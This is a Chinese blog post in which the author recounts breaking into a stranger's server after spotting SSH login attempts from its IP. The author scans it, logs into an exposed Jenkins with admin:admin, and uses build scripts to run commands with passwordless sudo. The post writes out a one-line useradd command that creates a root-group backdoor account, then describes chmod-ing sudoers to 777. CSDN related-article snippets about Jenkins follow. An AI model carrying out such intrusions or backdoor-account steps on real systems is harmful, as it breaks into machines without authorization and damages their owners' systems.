题外-jenkins

最新推荐文章于 2024-10-15 14:37:35 发布
最新推荐文章于 2024-10-15 14:37:35 发布
阅读量81 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43443135/article/details/115719279
版权

如题-jenkins

owasp top10 安全配置错误 + 弱口令
很早以前的事了,翻出来说一说(因为是事后好久写的文章,所以无图)

发现目标

当时在学习 linux 命令,知道了日志文件的存放位置 /var/log,随手 cat 了一下 security 日志,发现居然有人一直在我的 22 端口上尝试登录 ssh,于是在众多的目标中找了一个 ip 下手。

信息收集

nmap

使用 nmap 扫描发现 9999 端口开放,而且是 Jenkins 服务

web

使用浏览器访问发现是个需要登录的服务(当时也不知道 Jenkins 是什么)

弱口令

随手试了一下 admin:admin 居然登录进去了

google 黑客

因为不知道 Jenkins 是什么,就去网上搜了下:“Jenkins 是一个开源的、提供友好操作界面的持续集成(CI)工具,主要用于持续、自动的构建/测试软件项目、监控外部任务的运行。”而且它可以运行系统命令!

过程

  1. Jenkins 创建新项目,并且添加脚本 whoami,构建成功后返回了 jenkins
  2. 查看 sudo 权限,将脚本改为 sudo -l,结果返回**(ALL: ALL) NOPASSWD: ALL**(惊)
  3. 百度到管理员权限一句话添加 root 级别用户的方法(因为 jenkins 好像不支持交互式功能?)
    # 添加 root 组用户 admin 密码 adminfucker
sudo useradd -p `openssl passwd -1 -salt 'admin' adminfucker` -u xxx -g root -G root -s /bin/bash -d /usr/bin/admin admin
  4. 使用 ssh 成功登录 admin

脑瘫操作

发现 admin 用户还是无法以 root 权限执行命令(sudo),于是百度到 sudoers 这个文件,但是没有修改权限,于是返回 Jenkins 把它修改成 777,然后GG。

adminFucker
关注
测试开发工程师常见面试题----Jenkins
泽宇的博客
04-16 1547
Jenkins是一个开源自动化服务器,它是用Java开发的持续集成工具。 Jenkins通过持续集成并促进持续交付的技术方面,帮助实现软件开发过程中非人为部分的自动化。 Jenkins是什么? Jenkins是一个开源自动化服务器。 Jenkins是用Java开发的持续集成工具。 Jenkins通过持续集成并促进持续交付的技术方面,帮助实现软件开发过程中非人为部分的自动化。 Jenkins是一个开源软件;Jenkins是一个自动化服务器;Jenkins可以帮助自动化软件开发过程;Jenkins可以通
Jenkins 面试题
golove666的博客
04-04 2754
Jenkins高频面试题。
jenkins 面试题
热门推荐
麦迪康
05-25 2万+
1.jenkins是什么 Jenkins是一个开源的、可扩展的持续集成、交付、部署(软件/代码的编译、打包、部署)的基于web界面的平台。允许持续集成和持续交付项目,无论用的是什么平台,可以处理任何类型的构建或持续集成。 2.为什么使用jenkins Jenkins是一种使用Java编程语言编写的开源持续集成软件工具,用于实时测试和报告较大代码库中的孤立更改。 Jenkins软件使开发人员能够快速找到并解决代码库中的缺陷,并自动进行构建测试。 3.CI/CD是什么 CI(Continuous integra
[面试题]Jenkins
春暖花开的日子
06-23 1116
持续集成是一种实践,而 Jenkins 可以帮助团队去尽量好的去完成这种实践。即,Jenkins 是一个持续集成的工具。Jenkins 是基于 Java 语言的开源持续集成工具,提供了一套非常易用的用户界面,用以自动化构建、测试、部署等功能。Jenkins 类似于 Eclipse ,基于插件化的架构,方便功能的扩展,目前有几百个现成插件可以使用,这些插件涵盖从版本控制、构建工具、代码质量、构建通知、集成外部系统、UI定制、游戏等等各个方面。只要是个工具,基本是插件化的架构。
Jenkins面试题及答案
SZX的博客
03-07 9876
Jenkins是一个开源自动化服务器,它是用Java开发的持续集成工具。 Jenkins通过持续集成并促进持续交付的技术方面,帮助实现软件开发过程中非人为部分的自动化。 Jenkins是什么? Jenkins是一个开源自动化服务器。 Jenkins是用Java开发的持续集成工具。 Jenkins通过持续集成并促进持续交付的技术方面,帮助实现软件开发过程中非人为部分的自动化。 Jenkins是一...
部署 jenkins
叱咤少帅的博客
06-22 1454
部署 jenkins
Jenkins环境配置篇-更换插件源
LAMO
10-15 1000
作为的利器 Jenkins 已经得到了广泛地应用,仅仅作为一个工具,Jenkins 已然有了 自己的生态圈,支持其的 plugin 更是超过 1300+。在实际中如何使用以及如何更好地使用 jenkins,一直是大家在实践并讨论的。本系列文章将会从如何使用 jenkins 方面对一些细节 进行总结和整理,这篇文章将会介绍如何在 Jenkins 中更换插件源。
敏捷开发与/DevOps/ CloudBees Certified Jenkins Engineer (CJE)证书
simplilearnCN的博客
11-09 748
技多不压身,证书多不烫手,来考Jenkins工程师(CJE)吧!我看论坛里面这个话题貌似不热闹呢! Jenkins 是最好的 DevOps 工具之一,如果你知道 CJE认证后能拿到多少钱,估计你就有想法去认证 Jenkins 工程师了。 据 Glassdoor 称,认证 Jenkins 工程师的平均年薪估计在 72,000 美元到 126,000 美元之间,绝对是建立认证 Jenkins 工程师认证的绝佳理由! 全球有 8000 多个工作岗位可供对 Jenkins 进行持续集成和持续部署具有丰富知识的
DevOps进阶(七):使用 jenkins 和 nodejs 进行自动打包更新服务_jenkins nodejs打包(1)
2401_84433829的博客
04-26 675
源码管理主要是填写我们要构建的项目源码位置,这里我们填写git项目地址,当然还支持svn地址、文件地址、cvs地址等等:点击“
javaee笔试题-jenkins-demo:詹金斯演示
06-03
ee笔试题 免费的编程中文书籍索引 免费的编程中文书籍索引 国外程序员在 推荐的程序员必读书籍,。 上的程序员应该阅读的非编程类书籍有哪些? 上的一个流行的编程书籍索引 目录 语言无关类 操作系统 WEB服务器 版本...
Java面试题--持续集成
青春季风暴
04-07 2540
Tomcat tomcat 有哪几种Connector 运行模式(优化)? Bio/nio/apr概念 bio(blocking I/O) nio(non-blocking I/O) apr(Apache Portable Runtime/Apache可移植运行库) 相关解释: bio: 传统的Java I/O操作,同步且阻塞IO。 nio: JDK1.4开始支持,同步阻塞或...
软件测试知识点和面试题--接口测试篇
行走在路上
02-14 4109
接口规范 接口测试流程 测试用例的思路和方法 pymysql操作数据库 #导入pymysql import pymysql #建立连接 conn = pymysql.connect(host='ip', port=3306,user='账号', password='密码',database='数据库名',arset='utf8') #获取游标 cursor = conn.cursor() #执行查询语句 cursor.execute('select versio
百家互联网QA面试题--develop/CICD/容器化
后街女孩的博客
05-10 2303
1、简述一下对Jenkins的认识 Jenkins可以构建一个自动化的持续集成环境可以使用它来“自动化”编译、打包、分发部署应用,它兼容ant、maven、gradle等多种第三方构建工具,同时与svn、git能无缝集成,也支持直接与知名源代码托管网站,如github、bitbucket直接集成。 2、Jenkins的功能有哪些? 1.定时拉取代码并编译 2.静态代码分析 3.定时打包发布测试版 4.自定义额外的操作,如跑单元测试等 5.出错提醒 3、什么是持续集成? 持续集成是一种软件开发实践,即团队
智慧建造总体策划方案(76页).pptx
11-02
智慧建造总体策划方案(76页)
基于 Python2.7 和 PyQT4 开发的 modbus 通信采集软件
11-02
基于 Python2.7 和 PyQT4 开发的 modbus 通信采集软件,已在 windows、deepin linux 和树莓派上测试!
LLC simulink仿真《slx模型文件》
11-02
LLC simulink仿真《slx模型文件》 LLC谐振转换器是一种高效的直流-直流(DC-DC)电源转换器,因其独特的谐振特性而得名。在电力电子领域,LLC仿真对于理解和优化这种转换器的性能至关重要。Simulink是MATLAB环境下的一个强大工具,用于建立和仿真复杂系统,包括电力电子系统。 标题“LLC simulink仿真”指的是使用Simulink进行LLC谐振转换器的建模和仿真。通过Simulink,工程师可以模拟LLC转换器在不同工作条件下的行为,如负载变化、输入电压变动以及控制策略的影响。 **LLC电路的基本原理:** LLC谐振转换器结合了升压(Boost)、降压(Buck)和串联谐振(Series Resonant)三种拓扑结构的特点。它由主开关、副开关、电感、电容和二极管组成。谐振电容和电感形成谐振回路,使得开关器件能在零电压或零电流条件下切换,从而降低开关损耗并提高效率。 **仿真过程:** 在Simulink中,首先需要建立LLC转换器的模型,包括各个元件的参数设定。这包括主开关和副开关的开关频率、谐振电容和电感的值、二极管的反向恢复特性等。然后,设
krb5-devel-1.15.1-55.el7_9.i686.rpm
11-02
Centos7 el7.x86_64 官方离线安装包,安装指令为 sudo rpm -ivh krb5-devel-1.15.1-55.el7_9.i686.rpm
基于Matlab实现Stanley算法项目源码(下载即用)高分项目
11-02
基于Matlab实现Stanley算法项目源码(下载即用)高分项目,本资源中的源码都是经过本地编译过可运行的,评审分达到98分,资源项目的难度比较适中,内容都是经过助教老师审定过的能够满足学习、毕业设计、期末大作业和课程设计使用需求,如果有需要的话可以放心下载使用。 基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基于Matlab实现Stanley算法项目源码(下载即用)高分项目基
ruby-2.0.0.648-39.el7_9.x86_64.rpm
最新发布
11-02
Centos7 el7.x86_64 官方离线安装包,安装指令为 sudo rpm -ivh ruby-2.0.0.648-39.el7_9.x86_64.rpm
ks-jenkins 升级
03-14
ks-jenkins是一个基于Jenkins的持续集成和持续交付平台,用于帮助开发团队实现自动化构建、测试和部署。升级ks-jenkins可以提供更好的性能、功能和安全性。 升级ks-jenkins的步骤如下: 1.备份数据:在升级之前,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值